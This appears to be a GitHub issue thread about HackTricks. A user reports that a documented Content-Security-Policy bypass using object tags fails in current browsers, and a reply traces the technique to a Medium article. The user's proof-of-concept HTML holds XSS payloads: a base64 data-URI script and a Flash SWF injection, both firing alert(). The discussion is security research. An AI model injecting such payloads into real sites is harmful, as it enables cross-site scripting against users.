hacktricks
hacktricks copied to clipboard
CSP Bypass: "Lack of object-src and default-src" not working
Relating this part of HackTricks.
The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?
PoC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
<meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
</head>
<body>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
</body>
</html>
This results in Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”).
Yes, the third reference of that page brings you to https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d There you can find that technique (which I guess could be no longer working? I will try it)